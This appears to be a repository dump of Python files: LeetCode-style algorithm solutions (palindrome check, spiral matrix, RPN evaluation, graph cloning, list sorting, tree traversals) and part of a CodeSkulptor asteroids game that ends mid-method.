"content_id": "0ed41358ca52676d774697bd9576b55fe2f3290d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1002,
"license_type": "no_license",
"max_line_length": 182,
"num_lines": 36,
"path": "/Palindrome Number.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a boolean\n def isPalindrome(self, x):\n '''\n Determine whether an integer is a palindrome. Do this without extra space.\n\nclick to show spoilers.\nSome hints:\n\nCould negative integers be palindromes? (ie, -1)\n\nIf you are thinking of converting the integer to string, note the restriction of using extra space.\n\nYou could also try reversing an integer. However, if you have solved the problem \"Reverse Integer\", you know that the reversed integer might overflow. How would you handle such case?\n\nThere is a more generic way of solving this problem.\n\n '''\n t = x\n if x < 0:\n return False\n l = 0\n while t > 0:\n t //= 10\n l += 1\n for i in range(l // 2):\n a = (x // pow(10, i)) % 10\n b = (x // pow(10, l - i - 1)) % 10\n if a != b:\n return False\n return True\n\ns0 = 120030221\ns = s0\nprint(s)\nprint(Solution.isPalindrome(Solution(), s))"
},
{
"alpha_fraction": 0.4273437559604645,
"alphanum_fraction": 0.46015626192092896,
"avg_line_length": 24.117647171020508,
"blob_id": "389f41c01ac9e4b2b0cef772fd555665c841f221",
"content_id": "bb47fe82f7fa421a5bb63467f171b90c10335618",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1280,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 51,
"path": "/Spiral Matrix.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param matrix, a list of lists of integers\n # @return a list of integers\n def spiralOrder(self, matrix):\n '''\n Given a matrix of m x n elements (m rows, n columns), return all elements of the matrix in spiral order.\n\nFor example,\nGiven the following matrix:\n\n[\n [ 1, 2, 3 ],\n [ 4, 5, 6 ],\n [ 7, 8, 9 ]\n]\n\nYou should return [1,2,3,6,9,8,7,4,5]. \n '''\n if len(matrix) == 0:\n return []\n res = []\n l, r = 0, len(matrix[0]) - 1\n up, down = 0, len(matrix) - 1\n while l <= r and up <= down:\n for i in range(l, r):\n res.append(matrix[up][i])\n for i in range(up, down + 1):\n res.append(matrix[i][r])\n if l == r or up == down:\n break\n for i in range(r - 1, l, -1):\n res.append(matrix[down][i])\n for i in range(down, up, -1):\n res.append(matrix[i][l])\n l += 1\n r -= 1\n up += 1\n down -= 1\n return res\n\nn = 4\nm = []\nfor i in range(n):\n m.append([i * n + j + 1 for j in range(n)])\nm1 = [[6,9,7]]\nm2 = [[6], [9], [7]]\nm = m\nfor i in range(len(m)):\n print(m[i])\nres = Solution.spiralOrder(Solution(), m)\nprint(res)"
},
{
"alpha_fraction": 0.3913043439388275,
"alphanum_fraction": 0.4220389723777771,
"avg_line_length": 28.66666603088379,
"blob_id": "e3c2a026c1f457a29bbbda24030d53d2c6015a51",
"content_id": "0c94af1fac0404c5c4934dfdb9033865a2865924",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1334,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 45,
"path": "/Evaluate Reverse Polish Notation.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param tokens, a list of string\n # @return an integer\n def evalRPN(self, tokens):\n \"\"\" Evaluate the value of an arithmetic expression in Reverse Polish Notation.\n\nValid operators are +, -, *, /. Each operand may be an integer or another expression.\n\nSome examples:\n\n [\"2\", \"1\", \"+\", \"3\", \"*\"] -> ((2 + 1) * 3) -> 9\n [\"4\", \"13\", \"5\", \"/\", \"+\"] -> (4 + (13 / 5)) -> 6\n\"\"\"\n tab = \"+-*/\"\n stack = []\n for token in tokens:\n if tab.find(token) == -1:\n stack.append(int(token))\n else:\n b = stack.pop()\n a = stack.pop()\n op = token\n c = self.myEval(a, b, op)\n #print(c, \"=\", a, op, b)\n #stack.append(eval('%d%s%d' % (stack.pop(), token, tmp)))\n stack.append(c)\n return stack[0]\n\n def myEval(self, a, b, op):\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n else:\n return int(a * 1.0 / b)\n\ntokens1 = [\"2\", \"1\", \"+\", \"3\", \"*\"]\ntokens2 = [\"4\", \"13\", \"5\", \"/\", \"+\"]\ntokens3 = [\"10\", \"6\", \"9\", \"3\", \"+\", \"-11\", \"*\", \"/\", \"*\", \"17\", \"+\", \"5\", \"+\"]\ntokenss = tokens3\nprint(tokenss)\nss = Solution()\nprint(ss.evalRPN(tokenss))"
},
{
"alpha_fraction": 0.5593789219856262,
"alphanum_fraction": 0.5749055743217468,
"avg_line_length": 28.799999237060547,
"blob_id": "6f8b4951e2a9d841adc5b86a92f85fff9724f65e",
"content_id": "751fc7711da12e6717f968b43c25802079a27436",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2383,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 80,
"path": "/Clone Graph.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a undirected graph node\n# class UndirectedGraphNode:\n# def __init__(self, x):\n# self.label = x\n# self.neighbors = []\n\nclass Solution:\n # @param node, a undirected graph node\n # @return a undirected graph node\n def cloneGraph(self, node):\n ''' Clone an undirected graph. Each node in the graph contains a label and a list of its neighbors.\n\nOJ's undirected graph serialization:\n\nNodes are labeled uniquely.\nWe use # as a separator for each node, and , as a separator for node label and each neighbor of the node.\n\nAs an example, consider the serialized graph {0,1,2#1,2#2,2}.\n\nThe graph has a total of three nodes, and therefore contains three parts as separated by #.\n\n First node is labeled as 0. Connect node 0 to both nodes 1 and 2.\n Second node is labeled as 1. Connect node 1 to node 2.\n Third node is labeled as 2. Connect node 2 to node 2 (itself), thus forming a self-cycle.\n\nVisually, the graph looks like the following:\n\n 1\n / \\\n / \\\n 0 --- 2\n / \\\n \\_/\n'''\n if node is None:\n return None\n dict = {}\n queue = []\n preq = []\n queue.append(node)\n while len(queue) > 0:\n cur = queue.pop(0)\n if cur.label in preq:\n continue\n preq.append(cur.label)\n if cur.label not in dict:\n dict[cur.label] = UndirectedGraphNode(cur.label)\n copyNode = dict[cur.label]\n for tn in cur.neighbors:\n if tn.label not in dict:\n dict[tn.label] = UndirectedGraphNode(tn.label)\n copyNode.neighbors.append(dict[tn.label])\n if tn.label not in preq:\n queue.append(tn)\n return dict[node.label]\n\nclass UndirectedGraphNode:\n def __init__(self, x):\n self.label = x\n self.neighbors = []\n\n def __str__(self):\n res = str(self.label) + \":\"\n for n in self.neighbors:\n res += \" \" + str(n.label)\n res += \"# \"\n for n in self.neighbors:\n if self.label != n.label:\n res += str(n)\n return res\n\nN2 = UndirectedGraphNode(2)\nN2.neighbors = [N2]\nN1 = UndirectedGraphNode(1)\nN1.neighbors = [N2]\nN0 = UndirectedGraphNode(0)\nN0.neighbors = [N1, N2]\nso = Solution()\n#print(N0)\nprint(so.cloneGraph(N0))"
},
{
"alpha_fraction": 0.4561886191368103,
"alphanum_fraction": 0.46090373396873474,
"avg_line_length": 24.717172622680664,
"blob_id": "eb2f653af97cdc67539bed13618079856081bffe",
"content_id": "035d7430c021ec89785457f743d2b9a1221db7bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2545,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 99,
"path": "/Sort List.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a ListNode\n def sortList(self, head):\n \"\"\"Sort a linked list in O(n log n) time using constant space complexity.\"\"\"\n #print(head)\n return self.mergeList(head)\n\n def mergeList(self, node):\n #print('merge start', node)\n snode = node\n size = 0\n lh = None\n rh = None\n while node is not None:\n size += 1\n tmp = node\n node = node.next\n if size % 2:\n tmp.next = lh\n lh = tmp\n else:\n tmp.next = rh\n rh = tmp\n #print('size = ', size)\n #print(\"return: \" + str(snode))\n if size <= 1:\n return snode\n #print(\"lh : \" + str(lh))\n #print(\"rh : \" + str(rh))\n\n lres = self.mergeList(lh)\n rres = self.mergeList(rh)\n #print(\"lres : \" + str(lres))\n #print(\"rres : \" + str(rres))\n res = self.mergeSortedList(lres, rres)\n #print('merge end', res)\n return res\n\n def mergeSortedList(self, lh, rh):\n tlh = lh\n #print('sorted list start')\n while rh is not None:\n if lh.val > rh.val:\n tmpnode = rh\n rh = rh.next\n tmpnode.next = lh\n lh = tmpnode\n tlh = lh\n continue\n while lh.next is not None and lh.next.val < rh.val:\n lh = lh.next\n if lh.next is None and lh.val < rh.val:\n lh.next = rh\n break\n tmpnode = rh\n rh = rh.next\n tmpnode.next = lh.next\n lh.next = tmpnode\n #print('sorted list end')\n return tlh\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n def __str__(self):\n #print(\"in str\")\n tmp = self\n strs = []\n while tmp.next is not None:\n strs.append(str(tmp.val) + \"->\")\n tmp = tmp.next\n else:\n strs.append(str(tmp.val) + \";\")\n return \"\".join(strs)\n\nin0 = [1, 2, 4, 3, 2]\n\nins = [in0]\n\nfor tin in ins:\n head = ListNode(0)\n tail = head\n for val in tin:\n tail.next = ListNode(val)\n tail = tail.next\n ss = Solution()\n print(len(tin), tin)\n #print(head)\n print(ss.sortList(head.next))\n print()"
},
{
"alpha_fraction": 0.312992125749588,
"alphanum_fraction": 0.375984251499176,
"avg_line_length": 18.576923370361328,
"blob_id": "dffa6812ad8276b04202de2e353f12f09d92dd21",
"content_id": "d48e4926096dbba727178b38e94d8f1749f7f878",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 508,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 26,
"path": "/Pow(x, n).py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param x, a float\n # @param n, a integer\n # @return a float\n def pow(self, x, n):\n '''\n Implement pow(x, n). \n '''\n if n < 0:\n x = 1 / x\n n *= -1\n ex = 1\n base = x\n while n > 0:\n if n % 2 == 1:\n ex *= base\n n //= 2\n base *= base\n return ex\n\ns2 = [8.88023, 3]\ns1 = [2, 31]\ns3 = [34.00515, -3]\ns = s3\nprint(s)\nprint(Solution.pow(Solution(), s[0], s[1]))"
},
{
"alpha_fraction": 0.5159010887145996,
"alphanum_fraction": 0.5279151797294617,
"avg_line_length": 22.58333396911621,
"blob_id": "42f06943e58b2399d43f9e10f9f6ba1993aae8e3",
"content_id": "adf734517014b506ebc28d105f40ad5140d34e30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1415,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 60,
"path": "/Convert Sorted List to Binary Search Tree.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n#\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a list node\n # @return a tree node\n def sortedListToBST(self, head):\n '''Given a singly linked list where elements are sorted in ascending order, convert it to a height balanced BST.'''\n n = 0\n t = head\n while t:\n n += 1\n t = t.next\n return self.dfs([head], 0, n - 1)\n\n def dfs(self, t, l, r):\n if r < l:\n return None\n mid = (l + r) // 2\n lchild = self.dfs(t, l, mid - 1)\n parent = TreeNode(t[0].val)\n t[0] = t[0].next\n #print(l, r, mid, parent.val)\n parent.left = lchild\n parent.right = self.dfs(t, mid + 1, r)\n return parent\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\na = ListNode(3)\nb = ListNode(5)\nc = ListNode(8)\nd = ListNode(10)\ne = ListNode(13)\na.next = b\nb.next = c\nc.next = d\nd.next = e\ns = Solution()\nr = s.sortedListToBST(a)\n"
},
{
"alpha_fraction": 0.41126760840415955,
"alphanum_fraction": 0.4309859275817871,
"avg_line_length": 25,
"blob_id": "fa97dba5c4d7319963f2d452de7484503cbfd097",
"content_id": "575ac14a84d020934a0e8665a50cd98b9efc13a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1065,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 41,
"path": "/Implement strStr().py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param haystack, a string\n # @param needle, a string\n # @return a string or None\n def strStr(self, haystack, needle):\n '''\n Implement strStr().\n\nReturns a pointer to the first occurrence of needle in haystack, or null if needle is not part of haystack. \n '''\n return self.kmp(haystack, needle)\n\n def kmp(self, s, t):\n if len(t) == 0:\n return s\n p = [-1] * len(t)\n j = -1\n for i in range(1, len(t)):\n while j >= 0 and t[j + 1] != t[i]:\n j = p[j]\n if t[j + 1] == t[i]:\n j += 1\n p[i] = j\n\n j = -1\n for i in range(len(s)):\n while j >= 0 and s[i] != t[j + 1]:\n j = p[j]\n if s[i] == t[j + 1]:\n j += 1\n if j == len(t) - 1:\n return s[i - j:]\n return None\n\ns0 = ['abcabdabdedd', 'abd']\ns1 = ['a', '']\ns2 = ['babba', 'bbb']\ns3 = ['abcddef', 'ddek']\ns = s3\nprint(s)\nprint(Solution.strStr(Solution(), s[0], s[1]))"
},
{
"alpha_fraction": 0.43406593799591064,
"alphanum_fraction": 0.46978020668029785,
"avg_line_length": 28.54054069519043,
"blob_id": "6cd8f562c98bfd14a5f1e0470bfbd4ccdac588cc",
"content_id": "0c20f2f8a6b336517de090c3b857b580a6cfdbef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1092,
"license_type": "no_license",
"max_line_length": 187,
"num_lines": 37,
"path": "/Merge Sorted Array.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A a list of integers\n # @param m an integer, length of A\n # @param B a list of integers\n # @param n an integer, length of B\n # @return nothing\n def merge(self, A, m, B, n):\n '''\n Given two sorted integer arrays A and B, merge B into A as one sorted array.\n\nNote:\nYou may assume that A has enough space (size that is greater or equal to m + n) to hold additional elements from B. The number of elements initialized in A and B are m and n respectively.\n '''\n for i in range(m - 1, -1, -1):\n A[i + n] = A[i]\n l1, r1 = n, m + n\n l2, r2 = 0, n\n l = 0\n while l1 < r1 and l2 < r2:\n if A[l1] < B[l2]:\n A[l] = A[l1]\n l1 += 1\n else:\n A[l] = B[l2]\n l2 += 1\n l += 1\n if l1 == r1:\n for i in range(l2, r2):\n A[l] = B[i]\n l += 1\n\na1 = [[1, 0], [2]]\na = a1\nprint(a[0])\nprint(a[1])\nprint(Solution.merge(Solution(), a[0], 1, a[1], len(a[1])))\nprint(a[0])"
},
{
"alpha_fraction": 0.3584097921848297,
"alphanum_fraction": 0.3969419002532959,
"avg_line_length": 28.727272033691406,
"blob_id": "e088d2c97b91b1e5ad840e36e710fc3f949e2ceb",
"content_id": "a4a60cebc7d3e8df4692e90555a5487474910dc4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1635,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 55,
"path": "/Longest Consecutive Sequence.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param num, a list of integer\n # @return an integer\n def longestConsecutive(self, num):\n ''' Given an unsorted array of integers, find the length of the longest consecutive elements sequence.\n\nFor example,\nGiven [100, 4, 200, 1, 3, 2],\nThe longest consecutive elements sequence is [1, 2, 3, 4]. Return its length: 4.\n\nYour algorithm should run in O(n) complexity. '''\n down = {}\n up = {}\n prenum = set()\n for x in num:\n if x in prenum:\n continue\n flag = 0\n if x + 1 in down:\n r = down.pop(x + 1)\n down[x] = r\n up[r] = x\n if x in up:\n l = up.pop(x)\n r = down.pop(x)\n up[r] = l\n down[l] = r\n flag += 1\n if x - 1 in up:\n l = up.pop(x - 1)\n up[x] = l\n down[l] = x\n if x in down:\n l = up.pop(x)\n r = down.pop(x)\n up[r] = l\n down[l] = r\n flag += 1\n if flag == 0:\n down[x] = x\n up[x] = x\n prenum.add(x)\n max_con = 0\n for l in up:\n t = l - up[l] + 1\n max_con = max(max_con, t)\n #print(up)\n #print(down)\n return max_con\n\nnum1 = [100, 1, 2, 200, 4, 3, 7, 5, 6]\nnum2 = [-7, -1, 3, -9, -4, 7, -3, 2, 4, 9, 4, -9, 8, -7, 5, -1, -7]\nnum0 = [3, 4, 4, 5]\nnum = num2\nprint(Solution.longestConsecutive(Solution(), num))\n"
},
{
"alpha_fraction": 0.48042261600494385,
"alphanum_fraction": 0.48684483766555786,
"avg_line_length": 24.956989288330078,
"blob_id": "3e7ed55a87c4c5168800e9928f1665d51694e84d",
"content_id": "cdbe72596b36823ae673068070a3e343a1dd68b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4827,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 186,
"path": "/Binary Tree Postorder&Preorder Traversal.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Filename : Binary Tree Postorder/Preorder Traversal\n\n\n# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a list of integers\n def preorderTraversal(self, root):\n \"\"\"Given a binary tree, return the preorder traversal of its nodes' values.\n\nFor example:\nGiven binary tree {1,#,2,3},\n\n 1\n \\\n 2\n /\n 3\n\nreturn [1,2,3].\n\nNote: Recursive solution is trivial, could you do it iteratively?\"\"\"\n return self.doPreNonRecursively_Morris(root)\n\n # @param root, a tree node\n # @return a list of integers\n def postorderTraversal(self, root):\n \"\"\"Given a binary tree, return the postorder traversal of its nodes' values.\n\nFor example:\nGiven binary tree {1,#,2,3},\n\n 1\n \\\n 2\n /\n 3\n\nreturn [3,2,1].\n\nNote: Recursive solution is trivial, could you do it iteratively?\"\"\"\n return self.doPostNonRecursively_Morris(root)\n\n def doPostRecursively(self, node):\n if node is None:\n return []\n llist = self.doPostRecursively(node.left)\n rlist = self.doPostRecursively(node.right)\n llist.extend(rlist)\n llist.append(node.val)\n return llist\n\n def doPostNonRecursively(self, root):\n if root is None:\n return []\n res = []\n stack = []\n status = {}\n stack.append(root)\n status[root] = 0\n while len(stack) > 0:\n node = stack.pop()\n if status[node] == 1:\n res.append(node.val)\n continue\n stack.append(node)\n status[node] = 1\n status[node.right] = 1\n status[node.left] = 1\n if node.right:\n stack.append(node.right)\n status[node.right] = 0\n if node.left:\n stack.append(node.left)\n status[node.left] = 0\n return res\n\n def doPreRecursively(self, node):\n if node is None:\n return []\n list = [node.val]\n llist = self.doPreRecursively(node.left)\n rlist = self.doPreRecursively(node.right)\n list.extend(llist)\n list.extend(rlist)\n return list\n\n def doPreNonRecursively(self, root):\n if root is None:\n return []\n res = []\n stack = []\n status = {}\n stack.append(root)\n while len(stack) > 0:\n node = stack.pop()\n res.append(node.val)\n if node.right:\n stack.append(node.right)\n if node.left:\n stack.append(node.left)\n return res\n\n def doPreNonRecursively_Morris(self, root):\n cur = root\n l = []\n while cur:\n\n if cur.left:\n rightmost = cur.left\n while rightmost.right and rightmost.right != cur:\n rightmost = rightmost.right\n if rightmost.right == cur:\n cur = cur.right\n rightmost.right = None\n else:\n l.append(cur.val)\n rightmost.right = cur\n cur = cur.left\n else:\n l.append(cur.val)\n cur = cur.right\n return l\n\n def doPostNonRecursively_Morris(self, root):\n cur = TreeNode(-1)\n cur.left = root\n l = []\n while cur:\n if cur.left:\n rightmost = cur.left\n while rightmost.right and rightmost.right != cur:\n rightmost = rightmost.right\n if rightmost.right != cur:\n rightmost.right = cur\n cur = cur.left\n else:\n t = cur.left\n tl = []\n while t != cur:\n tl.append(t.val)\n t = t.right\n tl.reverse()\n l += tl\n rightmost.right = None\n cur = cur.right\n else:\n cur = cur.right\n return l\n\n\n# Definition for a binary tree node\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n def show(self):\n if self is None:\n return\n print(self.val, end=\" \")\n if self.left or self.right:\n if self.left:\n self.left.show()\n else:\n print(\"#\", end=\" \")\n if self.right:\n self.right.show()\n else:\n print(\"#\", end=\" \")\n\na = TreeNode(2)\nb = TreeNode(3)\nc = TreeNode(1)\na.show()\nprint()\ns = Solution()\nx = s.postorderTraversal(a)\nprint(x)"
},
{
"alpha_fraction": 0.6220806837081909,
"alphanum_fraction": 0.6326963901519775,
"avg_line_length": 38.29166793823242,
"blob_id": "3614838ee4651077dd913bce25a105b87dd440e9",
"content_id": "d902a81c2198e4973517d113997ac9e6628ecc78",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 942,
"license_type": "no_license",
"max_line_length": 267,
"num_lines": 24,
"path": "/Longest Substring Without Repeating Characters.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return an integer\n def lengthOfLongestSubstring(self, s):\n '''\n Given a string, find the length of the longest substring without repeating characters. For example, the longest substring without repeating letters for \"abcabcbb\" is \"abc\", which the length is 3. For \"bbbbb\" the longest substring is \"b\", with the length of 1.\n '''\n dic = {}\n maxlen = 0\n start = 0\n for i in range(len(s)):\n if s[i] in dic and dic[s[i]] > start:\n maxlen = max(maxlen, i - start)\n start = dic[s[i]]\n dic[s[i]] = i + 1\n maxlen = max(maxlen, len(s) - start)\n return maxlen\n\ns1 = \"wlrbbmqbhcdarzowkkyhiddqscdxrjmowfrxsjybldbefsarcbynecdyggxxpklorellnmpapqfwkhopkmco\"\ns2 = \"aaabcabc\"\ns3 = \"ruowzgiooobpple\"\ns4 = \"qopubjguxhxdipfzwswybgfylqvjzhar\"\ns = s4\nprint(len(s), s)\nprint(Solution.lengthOfLongestSubstring(Solution(), s))"
}
] | 115 |
rehmanis/Coursera | https://github.com/rehmanis/Coursera | 96d4b2a4ad832e13dd887fc28fd3e97f93b272ed | c9b376c474ccaea626e4c2c6f6b127975387c190 | 0229fceba50a82b51dee439d697c0fb7be4d36fa | refs/heads/master | 2020-12-05T22:19:42.811993 | 2019-08-26T21:39:17 | 2019-08-26T21:39:17 | 66,798,996 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5932977795600891,
"alphanum_fraction": 0.6113688349723816,
"avg_line_length": 34.40196228027344,
"blob_id": "cf31a1cf39f1482f6dba2b49d32676a78e10a4aa",
"content_id": "62cf2fba20ff74422b2148bfdc49bb23a0ad2250",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14443,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 408,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 2)/Mini-Project8 RiceRocks(Asteroids)/RiceRocks.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# program template for Spaceship\nimport simplegui\nimport math\nimport random\n\n# globals for user interface\nWIDTH = 800\nHEIGHT = 600\nROTATE_STEP = 0.0873\nCOEFF_FRIC = 0.02\nMAX_ROCK_ANG_VEL = 0.1\nMIN_ROCK_ANG_VEL = -0.1\nINIT_MAX_ROCK_VEL = 0.3\nINIT_MIN_ROCK_VEL = -0.3\nMAX_NUM_OF_ROCKS = 12\nACC = 0.2\n\nmax_rock_vel = INIT_MAX_ROCK_VEL\nmin_rock_vel = INIT_MIN_ROCK_VEL\nscore_to_change_vel = 5\nvel_multiplier = 1\nscore = 0\nlives = 3\ntime = 0\nstarted = False\n\nclass ImageInfo:\n def __init__(self, center, size, radius = 0, lifespan = None, animated = False):\n self.center = center\n self.size = size\n self.radius = radius\n if lifespan:\n self.lifespan = lifespan\n else:\n self.lifespan = float('inf')\n self.animated = animated\n\n def get_center(self):\n return self.center\n\n def get_size(self):\n return self.size\n\n def get_radius(self):\n return self.radius\n\n def get_lifespan(self):\n return self.lifespan\n\n def get_animated(self):\n return self.animated\n\n \n# art assets created by Kim Lathrop, may be freely re-used in non-commercial projects, please credit Kim\n \n# debris images - debris1_brown.png, debris2_brown.png, debris3_brown.png, debris4_brown.png\n# debris1_blue.png, debris2_blue.png, debris3_blue.png, debris4_blue.png, debris_blend.png\ndebris_info = ImageInfo([320, 240], [640, 480])\ndebris_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/debris2_blue.png\")\n\n# nebula images - nebula_brown.png, nebula_blue.png\nnebula_info = ImageInfo([400, 300], [800, 600])\nnebula_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/nebula_blue.f2014.png\")\n\n# splash image\nsplash_info = ImageInfo([200, 150], [400, 300])\nsplash_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/splash.png\")\n\n# ship image\nship_info = ImageInfo([45, 45], [90, 90], 35)\nship_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/double_ship.png\")\n\n# missile image - shot1.png, shot2.png, shot3.png\nmissile_info = ImageInfo([5,5], [10, 10], 3, 50)\nmissile_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/shot2.png\")\n\n# asteroid images - asteroid_blue.png, asteroid_brown.png, asteroid_blend.png\nasteroid_info = ImageInfo([45, 45], [90, 90], 40)\nasteroid_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/asteroid_blue.png\")\n\n# animated explosion - explosion_orange.png, explosion_blue.png, explosion_blue2.png, explosion_alpha.png\nexplosion_info = ImageInfo([64, 64], [128, 128], 17, 24, True)\nexplosion_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/explosion_alpha.png\")\n\n# sound assets purchased from sounddogs.com, please do not redistribute\nsoundtrack = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/soundtrack.mp3\")\nmissile_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/missile.mp3\")\nmissile_sound.set_volume(.5)\nship_thrust_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/thrust.mp3\")\nexplosion_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/explosion.mp3\")\n\n# alternative upbeat soundtrack by composer and former IIPP student Emiel Stopler\n# please do not redistribute without permission from Emiel at http://www.filmcomposer.nl\n#soundtrack = simplegui.load_sound(\"https://storage.googleapis.com/codeskulptor-assets/ricerocks_theme.mp3\")\n\n# helper functions to handle transformations\ndef angle_to_vector(ang):\n return [math.cos(ang), math.sin(ang)]\n\ndef dist(p,q):\n return math.sqrt((p[0] - q[0]) ** 2+(p[1] - q[1]) ** 2)\n\n# helper function to update and draw sprite in a group\ndef process_sprite_group(group_of_sprite, canvas):\n for sprite in set(group_of_sprite):\n sprite.draw(canvas)\n if (sprite.update()):\n group_of_sprite.remove(sprite)\n \n# helper function to check collision between a group of sprite and a single sprite \ndef group_collide(group_of_sprite, other_object):\n # initialize the global variables\n global an_explosion_group\n \n collision = False\n for sprite in set(group_of_sprite):\n if sprite.collide(other_object):\n group_of_sprite.remove(sprite)\n an_explosion_group.add(Sprite(sprite.get_position(), sprite.get_velocity(), \n sprite.get_angle(), 0, \n explosion_image, explosion_info, explosion_sound))\n collision = True\n \n return collision\n\n# helper function to check collisions between a group of sprite and other group of sprite\ndef group_group_collise(group_sprite, other_group_sprite):\n num_collisions = 0\n for sprite in set(group_sprite):\n if (group_collide(other_group_sprite, sprite)):\n group_sprite.remove(sprite)\n num_collisions += 1\n \n return num_collisions\n\n# Ship class\nclass Ship:\n def __init__(self, pos, vel, angle, image, info):\n self.pos = [pos[0],pos[1]]\n self.vel = [vel[0],vel[1]]\n self.thrust = False\n self.angle = angle\n self.angle_vel = 0\n self.image = image\n self.image_center = info.get_center()\n self.image_size = info.get_size()\n self.radius = info.get_radius()\n \n def draw(self,canvas):\n if (self.thrust):\n canvas.draw_image(self.image, [self.image_center[0] + self.image_size[0],self.image_center[1]],\n self.image_size, self.pos, self.image_size, self.angle)\n else:\n canvas.draw_image(self.image, self.image_center, self.image_size, self.pos, self.image_size,\n self.angle)\n \n def update(self):\n # position update\n self.pos[0] = (self.pos[0] + self.vel[0]) % WIDTH \n self.pos[1] = (self.pos[1] + self.vel[1]) % HEIGHT \n \n # add friction\n self.vel[0] *= (1 - COEFF_FRIC)\n self.vel[1] *= (1 - COEFF_FRIC)\n \n # update angular position\n self.angle += self.angle_vel\n \n # calculate the forward vector of the ship\n forward = angle_to_vector(self.angle)\n \n # update the velocity in the direction of forward vector\n if (self.thrust):\n self.vel[0] += ACC * forward[0]\n self.vel[1] += ACC * forward[1]\n \n def shoot_missile(self):\n global a_missile\n \n missile_pos = []\n missile_vel = []\n \n forward = angle_to_vector(self.angle)\n \n missile_pos.append(self.pos[0] + self.radius * forward[0])\n missile_pos.append(self.pos[1] + self.radius * forward[1])\n \n missile_vel.append(self.vel[0] + 6 * forward[0])\n missile_vel.append(self.vel[1] + 6 * forward[1])\n \n a_missile = Sprite(missile_pos, missile_vel, self.angle, 0, missile_image, missile_info, missile_sound)\n a_missile_group.add(a_missile)\n\n \n def 